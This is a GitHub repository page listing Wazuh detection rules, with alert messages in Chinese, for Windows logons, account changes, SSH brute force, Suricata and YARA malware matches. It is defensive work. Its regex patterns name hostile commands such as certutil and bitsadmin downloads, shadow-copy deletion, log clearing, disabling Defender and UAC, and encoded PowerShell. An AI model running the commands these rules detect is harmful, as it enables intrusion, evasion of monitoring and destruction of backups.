tuneplus/malwere-rule-wazuh_uzbek
GitHub: tuneplus/malwere-rule-wazuh_uzbek
一套面向 Wazuh 平台的开源安全检测规则集,提供 Windows、Linux、网络流量等多层面的威胁监控与告警能力。
Stars: 0 | Forks: 0
# malwere-rule-wazuh_uzbek
#ozbekcha wazuh ucun rule
60122 ^4625$
登录失败:用户 $(win.eventdata.targetUserName)
authentication_failed,audit_failure,
60106 ^4624$
登录成功:用户 $(win.eventdata.targetUserName)
authentication_success,
100012
警告:检测到暴力破解攻击!(用户:$(win.eventdata.targetUserName))
authentication_failed,brute_force,
60109
^4720$
SOC:已创建新用户!名称:$(win.eventdata.targetUserName)。操作者:$(win.eventdata.subjectUserName)
60111
^4726$
SOC:用户已被删除:$(win.eventdata.targetUserName)。操作者:$(win.eventdata.subjectUserName)
60110
^4723$|^4724$|^4738$
SOC:用户密码已更改:$(win.eventdata.targetUserName)
60144
IT-FULLCONTROL
SOC:严重!用户被添加到 IT-FULLCONTROL 组:$(win.eventdata.memberName)
privilege_escalation,mitre_t1098,
60103
(?i)powershell
警告:系统中启动了 PowerShell 进程!
suspicious_process,powershell,
60103
(?i)(whoami|net\s+user|ipconfig\s+/all|net\s+localgroup)
可疑活动:正通过 CMD 搜索系统信息:$(win.eventdata.commandLine)
discovery,mitre_t1082,mitre_t1087,
60103
(?i)(certutil.*-urlcache|certutil.*-f|curl|wget|bitsadmin)
警告:检测到尝试向系统下载未知文件!命令:$(win.eventdata.commandLine)
lateral_movement,mitre_t1105,
(?i)mshta\.exe
警报:检测到可疑的 MSHTA 进程!
defense_evasion,mitre_t1218.005,
(?i)cmd\.exe
警告:CMD(命令提示符)已启动
554
^X:\\FTP-MARKAZI|^C:\\Windows\\System32|^C:\\yara|^C:\\Users\\.*\\Downloads
已创建:重要文件夹中出现新文件:$(file)
syscheck,fim_event,fim_added,
553
^X:\\FTP-MARKAZI|^C:\\Windows\\System32|^C:\\yara|^C:\\Users\\.*\\Downloads
已删除:警告!重要文件已被删除:$(file)
syscheck,fim_event,fim_deleted,
550
^X:\\FTP-MARKAZI|^C:\\Windows\\System32|^C:\\yara|^C:\\Users\\.*\\Downloads
已更改:文件内容已被修改:$(file)
syscheck,fim_event,fim_modified,
fim_event
警告:在短时间内检测到批量文件更改/删除!(疑似 Ransomware)
syscheck,ransomware_detection,mitre_t1486,
windows
(?i)DisableRealtimeMonitoring|DisableAntiSpyware
严重:检测到禁用 Windows Defender 防护的尝试!
windows
EnableLUA.*0|ConsentPromptBehaviorAdmin.*0
严重:正在禁用 UAC(用户账户控制)!
windows
auditpol.*success:disable|auditpol.*failure:disable
严重:系统审计(日志记录)正在被停止!
windows
(?i)vssadmin.*delete.*shadows|Wmic.*Shadowcopy.*Delete
警告:系统备份副本(Shadow Copies)正在被删除!疑似 Ransomware 攻击!
windows
(?i)wevtutil.*(\scl\s|clear-log)
严重:正在通过 wevtutil 清除系统日志!
windows
(?i)Clear-EventLog|Remove-EventLog|Clear-History
严重:正在通过 PowerShell 清除系统日志或历史记录!
defense_evasion,powershell,
windows
^1102$|^104$
SOC 警报:Windows 日志已被成功清除!痕迹已被抹除!
windows
(?i)rar\.exe|7z\.exe|zip\.exe|tar\.exe
警告:系统中启动了归档程序(疑似数据外发)!
exfiltration,mitre_t1020,
windows
(?i)powershell.*(-enc|-EncodedCommand|-e\s+)
严重:检测到通过 PowerShell 执行的隐藏(编码)命令!(恶意软件特征)
malware_behavior,mitre_t1059.001,
windows
(?i)certutil.*-urlcache.*split.*-f
警报:正在通过 certutil 下载可疑文件(LOLBin 攻击)!
malware_behavior,discovery,mitre_t1105,
windows
(?i)bitsadmin.*\/transfer.*http
警报:检测到通过 bitsadmin 进行的可疑下载活动!
malware_behavior,mitre_t1197,
5715, 17101
SSH:成功登录系统(用户:$(dstuser))
authentication_success,
5710, 5503
SSH/PAM:检测到登录错误(用户:$(dstuser))
authentication_failed,
100192
警告:检测到 SSH 暴力破解攻击(IP:$(srcip))
T1110
authentication_failed,brute_force,
100191
root
危险:ROOT 用户通过 SSH 登录!
authentication_success,privileged_access,
5716, 17102
SSH:会话已关闭(用户:$(dstuser))
authentication_success,
100191
警告:输入了 3 次错误密码(IP:$(srcip))
authentication_failed,brute_force,
authentication_success
4624
Windows:成功登录
authentication_success,
authentication_failed
4625
Windows:检测到 RDP 登录错误
authentication_failed,
100215
Windows:检测到暴力破解攻击!(10 次错误)
authentication_failed,brute_force,
suricata
检测到 Suricata IDS 系统事件。
100400
DNS|event_type":"dns"
Suricata:网络中记录到 DNS 事件。
dns,
100400
failed decrypt|QUIC
警告(Suricata):检测到 QUIC 流量解密失败 (failed decrypt)!
suricata_alert,
yara_log_decoder
YARA:检测到恶意文件:$(yara.rule)
malware_yara,scan_report
yara_generic_decoder
YARA:检测到恶意文件:$(yara.rule)
malware_yara,scan_report
100501, 100502
ransomware|lockbit|wannacry|encrypt|golang_bin
严重:检测到 RANSOMWARE:$(yara.rule)
ransomware
100501, 100502
Trojan|RAT|njrat|darkcomet|Luckyware|fwhp|krypt|Reflo
严重:检测到 TROJAN/RAT:$(yara.rule)
trojan
100501, 100502
rootkit|hidden|process|hook|MiniDump|Rootkit|meth_get_eip|AntiVM|MassHunt
严重:检测到 ROOTKIT:$(yara.rule)
rootkit
100501, 100502
Backdoor|Cobalt|Shell|reverse_shell|pe_detect
危险:检测到 BACKDOOR:$(yara.rule)
backdoor
100501, 100502
miner|xmr|cryptominer|cpu|Miner|XMR|CoinMiner|monero|BtcMine
严重:检测到 CRYPTOMINER:$(yara.rule)
miner
100501, 100502
stealer|spyware|keylogger|infostealer|spy|Stealer|Spyware|Keylogger|InfoStealer|Stealc|RedLine|Raccoon|Vidar|AZORult|AgentTesla|SelfExtracting|FormBook|Noon
危险:检测到 INFOSTEALER/SPYWARE:$(yara.rule)
spyware
100501, 100502
webshell|Webshell|WebShell|c99|r57|b374k|WSO|FilesMan|shell|cmd\.php|eval|base64_decode
严重:检测到 WEBSHELL:$(yara.rule)
webshell
100501, 100502
(?i)worm|botnet|bot|mirai|ddos|spreader|p2p|autorun|xworm
严重:检测到 WORM/BOTNET:$(yara.rule)
worm_botnet
标签:Conpot, Metaprompt, PB级数据处理, Wazuh, Windows安全, 安全运维, 规则配置